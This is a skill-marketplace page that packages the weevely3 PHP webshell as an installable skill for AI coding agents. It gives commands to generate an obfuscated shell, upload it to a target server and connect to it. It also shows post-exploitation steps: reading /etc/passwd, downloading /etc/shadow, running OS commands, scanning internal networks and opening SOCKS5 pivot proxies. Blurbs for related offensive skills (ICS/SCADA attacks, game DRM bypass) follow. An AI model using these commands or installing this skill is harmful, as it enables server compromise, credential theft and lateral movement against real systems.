offensive-tools/shells/weevely3/SKILL.md
Stealth PHP webshell with 30+ post-exploitation modules for file ops, pivoting, and persistence. Use after file upload or RFI vulnerabilities to get an interactive PHP shell with built-in post-ex modules.
npx skillsauth add aeondave/malskill weevely3Install this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
Stealth PHP webshell with 30+ post-exploitation modules.
git clone https://github.com/epinna/weevely3
cd weevely3 && pip3 install -r requirements.txt
# Generate obfuscated PHP shell
python3 weevely.py generate MyPassword shell.php
# Upload shell.php to target
# Connect
python3 weevely.py http://target.com/uploads/shell.php MyPassword
| Command | Purpose |
|---------|---------|
| :help | List all modules |
| :file_read /etc/passwd | Read file |
| :file_download /etc/shadow /tmp/shadow | Download file |
| :file_upload /local/file /remote/path | Upload file |
| :shell_sh "id" | Run OS command |
| :net_scan 192.168.1.0/24 22,80,443 | Port scan |
| :net_proxy socks5 | Start SOCKS5 proxy |
| :audit_phpconf | Audit PHP config |
| :bruteforce_sql | SQL brute-force |
:system_* for host context and process visibility:file_* for file enumeration, read/write, exfiltration:audit_* for privilege-escalation and security posture checks:net_* for internal scanning and proxy pivoting:backdoor_* for reverse/direct shell pivotsFull post-ex after upload:
:shell_sh "id && uname -a"
:file_read /etc/passwd
:net_scan 10.10.10.0/24 22,80,443
:net_proxy socks5 0.0.0.0 1080
Pivot via SOCKS5:
:net_proxy socks5 127.0.0.1 1080
# Configure proxychains → proxychains nmap internal_host
:system_info
:shell_sh "id && uname -a && pwd"
:audit_phpconf
:file_ls .
Then choose one branch:
:file_find, :file_read, :file_download):net_ifconfig, :net_scan, :net_proxy):audit_suidsgid, :audit_filesystem)| File | When to load |
|------|--------------|
| references/module-playbooks.md | Practical module chains for triage, file loot, pivoting, and privilege-escalation reconnaissance |
data-ai
Scoped routing: Linux operator; hosts, sessions, users, services, packages, logs, containers, SSH, network paths, privilege evidence.
development
Offensive methodology for ICS/OT/SCADA environments in authorized industrial penetration testing and red team operations. Use when assessing PLCs, RTUs, HMIs, engineering workstations, historians, or field devices running Modbus, DNP3, EtherNet/IP, S7comm/S7+, Profinet, IEC 60870-5-104, BACnet, or OPC-UA. Covers passive OT network enumeration, protocol-level device interrogation, PLC coil/register read-write attacks, HMI session exploitation, historian and engineering workstation compromise, and safe escalation rules for critical infrastructure scope. Does not cover: general IT network exploitation (network-technique), physical hardware interfaces UART/JTAG/SPI (hardware-technique), wireless sensor network attacks (wireless-technique), RF/SDR signal analysis (hardware-ctf or wireless-technique), or CTF-framed ICS lab tasks (ics-ctf).
tools
Offensive methodology for authorized game security assessments, game client security research, and game-adjacent penetration testing in real-world engagements. Use when assessing game clients for cheating vulnerabilities, testing anti-cheat effectiveness, auditing game server protocols for score manipulation or economic fraud, reverse engineering game DRM or license validation, analyzing game save file protection, or assessing game mod/plugin security. Covers: process memory scanning and manipulation (Cheat Engine methodology), game binary reversing for license and DRM bypass, game network protocol analysis and packet replay, anti-cheat mechanism analysis, save file format reversing and tampering, speed hack and value injection techniques. Does NOT cover: CTF game challenges (game-ctf), game engine source code auditing (web-exploit-technique or vuln-search-technique for the backend), or general binary exploitation (pwn-ctf or reversing-technique).
development
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.